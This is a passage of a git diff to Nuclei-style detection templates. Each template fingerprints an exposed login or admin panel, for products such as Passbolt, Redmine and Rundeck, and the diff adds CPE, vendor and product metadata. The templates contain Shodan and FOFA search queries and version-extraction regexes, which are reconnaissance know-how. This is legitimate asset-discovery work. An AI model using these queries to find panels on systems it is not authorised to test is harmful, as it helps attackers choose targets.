4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml index 56692d4251..5bb8e177d7 100644 --- a/http/exposed-panels/passbolt-panel.yaml +++ b/http/exposed-panels/passbolt-panel.yaml @@ -1,5 +1,5 @@ -id: passbolt-panel - +id: passbolt-panel + info: name: Passbolt Login Panel author: righettod @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: http.title:"Passbolt | Open source password manager for teams" + product: passbolt_api + vendor: passbolt tags: panel,passbolt,login -http: - - method: GET - path: - - "{{BaseURL}}/auth/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "Passbolt") && contains(body, "Open source password manager for teams")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:passbolt:passbolt_api:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/auth/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Passbolt") && contains(body, "Open source password manager for teams")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '(?i)v=([0-9a-z.-]+)' -# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/payroll-management-system-panel.yaml b/http/exposed-panels/payroll-management-system-panel.yaml index ba66eaef83..80bc477b85 100644 --- a/http/exposed-panels/payroll-management-system-panel.yaml +++ b/http/exposed-panels/payroll-management-system-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:payroll_management_system_project:payroll_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Admin | Employee's Payroll Management System" + product: payroll_management_system + vendor: payroll_management_system_project tags: panel,payroll http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031cc9e75391421ff20c6432952369e61f2e5ca5a95b74726627b042a2bf70249022100c691d0122ef4f4b932364550593805d5f19108b477c0855a67cb93243863b530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031cc9e75391421ff20c6432952369e61f2e5ca5a95b74726627b042a2bf70249022100c691d0122ef4f4b932364550593805d5f19108b477c0855a67cb93243863b530:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/persis-panel.yaml b/http/exposed-panels/persis-panel.yaml index dd3570be42..de24ef98de 100644 --- a/http/exposed-panels/persis-panel.yaml +++ b/http/exposed-panels/persis-panel.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:persis:human_resource_management_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Persis" + product: human_resource_management_portal + vendor: persis tags: panel,persis http: @@ -44,4 +47,4 @@ http: - 301 - 302 condition: or -# digest: 4a0a004730450220103342b6207c74f5c8a3be7c901af68917c81e15a614a17e6fdf8ed079f5a1d4022100d25a1b9ce33f2e5c47511b8c027df9e364f5eeb5d677039db2f7e6aba62a2602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220103342b6207c74f5c8a3be7c901af68917c81e15a614a17e6fdf8ed079f5a1d4022100d25a1b9ce33f2e5c47511b8c027df9e364f5eeb5d677039db2f7e6aba62a2602:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/php-mailer.yaml b/http/exposed-panels/php-mailer.yaml index 03c1a5c96b..0f94e3d761 100644 --- a/http/exposed-panels/php-mailer.yaml +++ b/http/exposed-panels/php-mailer.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"PHP Mailer" + product: phpmailer + vendor: phpmailer_project tags: panel,php,mailer http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022022a5c125e09f6b8c72caf9716c0781af927d5bc75026eb7cc78510f4f9adee4b022100df9cc90c9accb56206a47b6858aef6952620995976cdb21a00e6051f7f6e472a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022a5c125e09f6b8c72caf9716c0781af927d5bc75026eb7cc78510f4f9adee4b022100df9cc90c9accb56206a47b6858aef6952620995976cdb21a00e6051f7f6e472a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index 5edd411670..be97e98ba2 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 3 shodan-query: title:"phpLDAPadmin" + product: phpldapadmin + vendor: phpldapadmin_project tags: php,phpldapadmin,panel,detect + classification: + cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: group: 1 regex: - '<div id="ajFOOT">([0-9.]+)<\/div>' -# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/phpminiadmin-panel.yaml b/http/exposed-panels/phpminiadmin-panel.yaml index 54ddcd3ec9..f6f1836fbe 100644 --- a/http/exposed-panels/phpminiadmin-panel.yaml +++ b/http/exposed-panels/phpminiadmin-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:phpminiadmin_project:phpminiadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"phpMiniAdmin" + product: phpminiadmin + vendor: phpminiadmin_project tags: panel,phpminiadmin http: @@ -35,4 +38,4 @@ http: group: 1 regex: - 'phpMiniAdmin ([0-9._]+)' -# digest: 4b0a00483046022100d212825fb36c416f881977f2580ee10885cb37348e993061842c46ac94bdede7022100925d6f015bfdafdca27d5b707a840504e71c47e038e0400d55e91e3b346b34c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d212825fb36c416f881977f2580ee10885cb37348e993061842c46ac94bdede7022100925d6f015bfdafdca27d5b707a840504e71c47e038e0400d55e91e3b346b34c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/pichome-panel.yaml b/http/exposed-panels/pichome-panel.yaml index 62914c259a..9647b9c24f 100644 --- a/http/exposed-panels/pichome-panel.yaml +++ b/http/exposed-panels/pichome-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:oaooa:pichome:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.favicon.hash:933976300 + product: pichome + vendor: oaooa tags: pichome,panel http: @@ -36,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d78357de7217460dfecaca527e44dac1d96cd1935c48dec2fbdeb8528de69a0022100ab51401daa4e16681512324873d529b36f752227b934abdb0201dff7102a014b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d78357de7217460dfecaca527e44dac1d96cd1935c48dec2fbdeb8528de69a0022100ab51401daa4e16681512324873d529b36f752227b934abdb0201dff7102a014b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml index 31b4daccb2..c634b1aaad 100644 --- a/http/exposed-panels/posteio-admin-panel.yaml +++ b/http/exposed-panels/posteio-admin-panel.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Administration login" html:"poste<span" + product: poste.io + vendor: analogic tags: panel,poste,login,detect + classification: + cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d11de7670596406fc1fd665bf0263ae0c764b93ef1c083ccea64f3d02960c87022100b523f619b615dc23cb8688226e2da8ba06edb3fcdc62cb3676b0f8f9f35e4111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d11de7670596406fc1fd665bf0263ae0c764b93ef1c083ccea64f3d02960c87022100b523f619b615dc23cb8688226e2da8ba06edb3fcdc62cb3676b0f8f9f35e4111:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/powerjob-panel.yaml b/http/exposed-panels/powerjob-panel.yaml index 6ad25f2741..7ab9037ce5 100644 --- a/http/exposed-panels/powerjob-panel.yaml +++ b/http/exposed-panels/powerjob-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: title="PowerJob" + product: powerjob + vendor: powerjob tags: panel,powerjob http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204891cc99ac7c7cb02689801b1565146449c0a3fd95de90047b749da7809398c00220444b7489f3c11e01a354f2b029b9bdb469ee431d554faa73ad682401549e9a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204891cc99ac7c7cb02689801b1565146449c0a3fd95de90047b749da7809398c00220444b7489f3c11e01a354f2b029b9bdb469ee431d554faa73ad682401549e9a32:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/privx-panel.yaml b/http/exposed-panels/privx-panel.yaml index 3fa19673b2..583a4429f7 100644 --- a/http/exposed-panels/privx-panel.yaml +++ b/http/exposed-panels/privx-panel.yaml @@ -10,9 +10,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ssh:privx:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"PrivX" + product: privx + vendor: ssh tags: panel,privx http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed4105163230498264d228fef1b1c4b8fbf1b35a5368f06cd406b15b159a9c0702205bf89d5026636e5b43f6faf5cb81ae99231da8e188c34e8914f9b77db3712b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed4105163230498264d228fef1b1c4b8fbf1b35a5368f06cd406b15b159a9c0702205bf89d5026636e5b43f6faf5cb81ae99231da8e188c34e8914f9b77db3712b1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 4cc4bbea02..b1400e5076 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -1,5 +1,5 @@ -id: qlikview-accesspoint-panel - +id: qlikview-accesspoint-panel + info: name: QlikView AccessPoint Login Panel - Detect author: righettod @@ -12,20 +12,24 @@ info: verified: true max-request: 1 shodan-query: title:"QlikView - AccessPoint" + product: qlikview + vendor: qlik tags: panel,qlikview,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/qlikview/FormLogin.htm" - - host-redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' + classification: + cpe: cpe:2.3:a:qlik:qlikview:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/qlikview/FormLogin.htm" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' condition: and -# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/qualcomm-voip-router.yaml b/http/exposed-panels/qualcomm-voip-router.yaml index fefe72fdc8..390e56232f 100644 --- a/http/exposed-panels/qualcomm-voip-router.yaml +++ b/http/exposed-panels/qualcomm-voip-router.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:qualcomm:qca4531_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="Qualcomm-4G-LTE-WiFi-VoIP-Router" + product: qca4531_firmware + vendor: qualcomm tags: panel,qualcomm,iot,router,voip http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207b64d7e250bb54030154f9d481924cfa124dbb58a3b1f61c582732eeedc8e912022009d3c435b909dcceb5c4b0ace38ffdda4f002969ecfa31553027a2a6ca83da17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b64d7e250bb54030154f9d481924cfa124dbb58a3b1f61c582732eeedc8e912022009d3c435b909dcceb5c4b0ace38ffdda4f002969ecfa31553027a2a6ca83da17:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/raspberrymatic-panel.yaml b/http/exposed-panels/raspberrymatic-panel.yaml index 313d2e8196..eda1e91042 100644 --- a/http/exposed-panels/raspberrymatic-panel.yaml +++ b/http/exposed-panels/raspberrymatic-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:raspberrymatic:raspberrymatic:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-578216669 + product: raspberrymatic + vendor: raspberrymatic tags: panel,raspberrymatic,iot http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022065778ede8a3a0a8a1fd9a3dd010d40ad46f6dbe9690d94e91644ae79b56f3b200221008705e99c94969d6edfee6e55534b3ad02aa433f327929710a846556cab660828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065778ede8a3a0a8a1fd9a3dd010d40ad46f6dbe9690d94e91644ae79b56f3b200221008705e99c94969d6edfee6e55534b3ad02aa433f327929710a846556cab660828:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/redhat/redhat-satellite-panel.yaml b/http/exposed-panels/redhat/redhat-satellite-panel.yaml index 186071a837..aeab9e3033 100644 --- a/http/exposed-panels/redhat/redhat-satellite-panel.yaml +++ b/http/exposed-panels/redhat/redhat-satellite-panel.yaml @@ -7,10 +7,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:redhat:satellite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"redhat" "Satellite" + product: satellite + vendor: redhat tags: panel,redhat,satellite http: @@ -38,4 +41,4 @@ http: group: 1 regex: - '"version":"([0-9.]+)",' -# digest: 4a0a00473045022100f3fd5eddb60fdcbe55acc1ebca51dc319eb759a338abcc142c8300f739550edd02202abab0d346cb841375863edb6bdbb43360ddcb2918ff6ac6d5b322fd60efa4f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3fd5eddb60fdcbe55acc1ebca51dc319eb759a338abcc142c8300f739550edd02202abab0d346cb841375863edb6bdbb43360ddcb2918ff6ac6d5b322fd60efa4f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml index e14d5303ee..f25a55fd90 100644 --- a/http/exposed-panels/redis-enterprise-panel.yaml +++ b/http/exposed-panels/redis-enterprise-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Enterprise-Class Redis for Developers" + product: redis_enterprise + vendor: redis tags: panel,redis,enterprise + classification: + cpe: cpe:2.3:a:redis:redis_enterprise:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/redmine-panel.yaml b/http/exposed-panels/redmine-panel.yaml index 2dc30b835a..ccb9179d78 100644 --- a/http/exposed-panels/redmine-panel.yaml +++ b/http/exposed-panels/redmine-panel.yaml @@ -1,5 +1,5 @@ -id: redmine-panel - +id: redmine-panel + info: name: Redmine Login Panel - Detect author: righettod @@ -11,17 +11,21 @@ info: verified: true max-request: 1 shodan-query: http.html:'content="Redmine' + product: redmine + vendor: redmine tags: panel,redmine,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "content=\"Redmine")' + classification: + cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "content=\"Redmine")' condition: and -# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/remedy-axis-login.yaml b/http/exposed-panels/remedy-axis-login.yaml index 154c2e1c31..c7694ac06c 100644 --- a/http/exposed-panels/remedy-axis-login.yaml +++ b/http/exposed-panels/remedy-axis-login.yaml @@ -7,10 +7,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:bmc:remedy_action_request_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.html:"BMC Remedy" + product: remedy_action_request_system + vendor: bmc tags: panel,remedy,bmc http: @@ -32,4 +35,4 @@ http: - "BMC Remedy" - "BMC Smart Reporting" condition: or -# digest: 4b0a00483046022100af2f2d99fd9172173406d73bc98dfc8271f0cfa7180cba06668495d0edb9bd77022100f69eb9cf7a02212e147be9727f3127f1770e51a9b835f0b523fb0a4a35a52e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af2f2d99fd9172173406d73bc98dfc8271f0cfa7180cba06668495d0edb9bd77022100f69eb9cf7a02212e147be9727f3127f1770e51a9b835f0b523fb0a4a35a52e9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/remkon-manager-panel.yaml b/http/exposed-panels/remkon-manager-panel.yaml index a11393b4a9..b22958f53c 100644 --- a/http/exposed-panels/remkon-manager-panel.yaml +++ b/http/exposed-panels/remkon-manager-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:nascent:remkon_device_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Remkon Device Manager" + product: remkon_device_manager + vendor: nascent tags: panel,remkon,login http: @@ -28,4 +31,4 @@ http: part: body words: - "<title>Remkon Device Manager" -# digest: 4a0a004730450221008f07d8b0769ae701d3a193ccb2aef1ab68ae1552468eca35421af7c01b800e0e0220481e363408d9df9a904522a3620393185e61212e60e4e32554f9f3dacfa0be8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f07d8b0769ae701d3a193ccb2aef1ab68ae1552468eca35421af7c01b800e0e0220481e363408d9df9a904522a3620393185e61212e60e4e32554f9f3dacfa0be8f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/retool-login.yaml b/http/exposed-panels/retool-login.yaml index 9a9c54cf33..b4f9d82ffb 100644 --- a/http/exposed-panels/retool-login.yaml +++ b/http/exposed-panels/retool-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:retool:retool:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Retool" + product: retool + vendor: retool tags: login,panel,retool http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a05464195939d8c72ee870df16eec4b1df853e9655dd8b2b54fa7265b06e6bc302210091dc802e8f0d39cc4a7deab945267b32641777529a626422bc877149a0999ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a05464195939d8c72ee870df16eec4b1df853e9655dd8b2b54fa7265b06e6bc302210091dc802e8f0d39cc4a7deab945267b32641777529a626422bc877149a0999ed8:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/rocketchat-panel.yaml b/http/exposed-panels/rocketchat-panel.yaml index 08a0505f08..3fd871a8f7 100644 --- a/http/exposed-panels/rocketchat-panel.yaml +++ b/http/exposed-panels/rocketchat-panel.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Rocket.Chat" + product: rocket.chat + vendor: rocket.chat tags: panel,rocketchat,login,detect + classification: + cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - 'status_code == 200' - 'contains_any(body, "Rocket.Chat", "content=\"Rocket.Chat")' condition: and -# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/room-alert-detect.yaml b/http/exposed-panels/room-alert-detect.yaml index 54a4026d53..8203ab23ee 100644 --- a/http/exposed-panels/room-alert-detect.yaml +++ b/http/exposed-panels/room-alert-detect.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:avtech:room_alert_3e:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Room Alert" + product: room_alert_3e + vendor: avtech tags: panel,room-alert,avtech http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f209013866edb16f4b3b302f70b010d94be3804c32e8f1acc026b6025d58601022042964ec33b8ceea08c10c9f5693f0698a2ec667d5cc2820b31546477c1754969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f209013866edb16f4b3b302f70b010d94be3804c32e8f1acc026b6025d58601022042964ec33b8ceea08c10c9f5693f0698a2ec667d5cc2820b31546477c1754969:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/rundeck-login.yaml b/http/exposed-panels/rundeck-login.yaml index bf3e334b77..0daf350a01 100644 --- a/http/exposed-panels/rundeck-login.yaml +++ b/http/exposed-panels/rundeck-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Rundeck" + product: rundeck + vendor: pagerduty tags: panel,rundeck http: @@ -43,4 +46,4 @@ http: - 'utm_medium=([0-9.]+)-' - 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck - '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck -# digest: 4a0a00473045022100ddab622ffbe8b4b4ad9960507feafb068180c53f510494c6f13d7dbecf05e92902201b5aa62a5f89d30b8e824f06816c129cafabe0547a2844ac780288c6ba127cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddab622ffbe8b4b4ad9960507feafb068180c53f510494c6f13d7dbecf05e92902201b5aa62a5f89d30b8e824f06816c129cafabe0547a2844ac780288c6ba127cce:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/saltstack-config-panel.yaml b/http/exposed-panels/saltstack-config-panel.yaml index 7709cbab12..09e1fcb0be 100644 --- a/http/exposed-panels/saltstack-config-panel.yaml +++ b/http/exposed-panels/saltstack-config-panel.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:saltstack:saltstack:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"SaltStack Config" + product: saltstack + vendor: saltstack tags: panel,vmware,login,saltstack http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ffea67b100382600235ccdb3e586578f33c452dc314b8589f4ebc8186054d3890221009604fcf4923fdc0e872935cfe6230762cfaf38600d0fbb6e685c457d9766cb73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffea67b100382600235ccdb3e586578f33c452dc314b8589f4ebc8186054d3890221009604fcf4923fdc0e872935cfe6230762cfaf38600d0fbb6e685c457d9766cb73:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index 7a45b6629e..a11079da5a 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: title:"ScriptCase" + product: scriptcase + vendor: scriptcase tags: panel,scriptcase + classification: + cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +45,4 @@ http: group: 2 regex: - '(Versão|Version|Versão)\b.*\s(\d.*\d)' -# digest: 490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 952ad9252d..879273450e 100644 --- 